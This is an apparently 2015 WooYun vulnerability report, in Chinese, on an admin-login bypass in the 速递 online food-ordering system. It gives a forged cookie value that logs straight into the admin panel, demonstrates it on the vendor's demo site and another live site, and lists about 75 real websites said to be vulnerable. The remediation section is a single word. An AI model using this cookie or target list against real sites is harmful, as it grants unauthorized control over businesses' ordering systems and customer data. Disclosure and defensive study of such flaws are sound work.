当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106449

漏洞标题:速递网上订餐系统后台任意登陆

相关厂商:速递网上订餐系统

漏洞作者: Ch丶0nly

提交时间:2015-04-08 14:32

修复时间:2015-05-23 14:34

公开时间:2015-05-23 14:34

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

速递订餐系统专业从事网上订餐系统研究开发。主要产品包括:速递网上订餐系统,速递电话订餐系统,手机订餐系统等。 速递订餐系统有很多个的成功案例,总结出各个行业成功经验,并将其融入到技术和产品当中。

漏洞证明:

专业项目: 1、订餐系统开发 2、行业管理软件 3、网站建设
官方网站:http://www.dc135.cn
该系统存在后台绕过漏洞 由于设计不当构造Cookie可登陆任意网站
直接拿官网演示站证明
漏洞演示:http://s.dc135.cn/admin/login.aspx (默认后台地址为admin)
来到后台登陆页面,把我们的
Cookie修改成:admin_name=YCTubJNynzOIw9pfy+JPyA==; 150407150609196=77xOl1M5qBkoIFclY57nZ3xTX9VDshuRB5r3kyyEPmxz4YACu/NwxKSC4R9C42Eeqfn/T3y8lFA6AmNP9h0DCQ==

1.jpg


然后访问后台首页:http://s.dc135.cn/admin/index.aspx

1.jpg


成功登陆后台
http://www.wo1818.cn/admin/login.aspx
修改Cookie为:admin_name=YCTubJNynzOIw9pfy+JPyA==; 150407150609196=77xOl1M5qBkoIFclY57nZ3xTX9VDshuRB5r3kyyEPmxz4YACu/NwxKSC4R9C42Eeqfn/T3y8lFA6AmNP9h0DCQ==
访问后台首页
http://www.wo1818.cn/admin/index.aspx

1.jpg


附大量案例:
http://s.dc135.cn
http://p.dc135.cn
http://www.56769999.com
http://www.wo1818.cn
http://www.zdsha.com
http://www.huiguoxian.com
http://www.1688.cd
http://www.longheruijia.net
http://www.shanghailecheng.com
http://www.nianhuoshao.net
http://www.xhb.so
http://www.kuaieke.com
http://www.dsxyyc.net
http://www.yxlkc.com
http://www.efood51.com
http://www.ichifan.cn
http://www.ycttkc.net
http://www.0993chi.com
http://5haochi.gotoip4.com
http://www.51wwwcom.com
http://www.fszjf.net
http://www.youshidao.com
http://www.z8dian.com
http://www.beijingguijie.com
http://dc.yydh.net
http://www.yppks.com
http://www.517970.com
http://www.12d.in
http://www.agankc.com
http://www.yigi.com
http://www.52wswm.com
http://www.baiweida.cn
http://www.dx2168.com
http://www.jshaoji.com
http://www.aishangkc.com
http://www.zibenjia.cc
http://www.4000129329.com
http://www.jiashihui.net
http://www.2hd610.com
http://www.junhuilai.com
http://www.wm119.com
http://www.xn--mtss0p.cn
http://www.qihefan.com
http://www.15lida.com
http://www.juhuicom.com
http://www.yijiakc.com
http://www.kuaidian.biz
http://www.gmtg33.com
http://www.xn--lwr591aunl.com
http://www.yxlzc.com
http://www.fzjjs.com
http://www.365waimai.com
http://www.youcan114.com
http://www.91waimai.com
http://www.tondong.com
http://www.zzqmkc.com
http://www.umke.cn
http://www.chinesefooddeli.com
dc135135.39.cvod.net
http://www.whwmwang.com
http://www.websongcan.com
http://www.qhmw.net
http://www.wsdcw.com
http://sd-shop.cn
http://www.xiangmiwu.com
http://www.est517.com
http://www.75fan.com
http://www.51wsd.com
http://www.51haoziwei.com
http://www.hnyehuo.com
http://www.026978.com
http://www.jingyuanbuy.com
http://www.chiwoba.cn
http://www.meiweisong.com
http://www.sanqigame.com

修复方案:

修复

版权声明:转载请注明来源 Ch丶0nly@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝